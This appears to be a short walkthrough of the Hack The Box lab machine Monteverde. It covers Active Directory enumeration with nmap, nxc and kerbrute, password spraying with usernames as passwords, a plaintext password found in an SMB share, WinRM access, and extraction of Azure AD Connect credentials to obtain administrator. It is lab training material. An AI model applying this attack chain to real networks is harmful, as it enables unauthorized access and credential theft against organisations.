2 minute read

Monteverde

Reconnaissance

IP: 10.10.10.172

NMAP

nmap -T4 -p- -A 10.10.10.172
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-30 05:49 UTC
Nmap scan report for 10.10.10.172
Host is up (0.030s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-08-30 05:51:07Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49696/tcp open  msrpc         Microsoft Windows RPC
49754/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-08-30T05:52:03
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: -2s

TRACEROUTE (using port 445/tcp)
HOP RTT      ADDRESS
1   30.11 ms 10.10.14.1
2   30.20 ms 10.10.10.172

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 187.81 seconds

SMB, LDAP

first gather domain name and users

nxc smb 10.10.10.172
nxc ldap 10.10.10.172 -u '' -p '' --query "(objectClass=*)" "*"

full ldap scan

scan for users:

nxc ldap 10.10.10.172 -u '' -p '' --query "(objectClass=*)" "userPrincipalName"

To confirm valid users I used kerbrute

kerbrute userenum -d MEGABANK.LOCAL --dc 10.10.10.172 users.txt

Brute force with Welcome1 Passoword1 etc did nothing but when I use usernames as password I found valid credentials:

nxc smb 10.10.10.172 -u users.txt -p users.txt

Fast scan with valid user I found few shares and new username AAD_987d7f2f57d2 (later I watched Ippsec video and he told that this is account for synchronise azure with local AD )

Gaining Access

now let’s enumerate shares. In users share I found 4 users directory download it and chceck:

smbclient \\\\10.10.10.172\\users$ -U SABatchJobs

In mhope directory I found azure.xml file after opening file I spot the Password: 4n0therD4y@n0th3r$

confirm that this is mhope password

nxc smb 10.10.10.172 -u users.txt -p '4n0therD4y@n0th3r$' --continue-on-success

now let’s check for shares and winrm access: We can connect via evil-winrm and grab user flag

Privilege escalation

running winpeas I found that there is Cloud Credentials and mhope is in Azure Admins group

Searching google I found article how to extract this credentials https://blog.xpnsec.com/azuread-connect-for-redteam/

this didn’t work for me but I found simmilar

https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Azure-ADConnect.ps1?source=post_page—–808ffe5cdded—————————————

Get script on machine, Import module and we have example command in line 13/14 of script

administrator d0m@in4dminyeah! confirming access and we can take root flag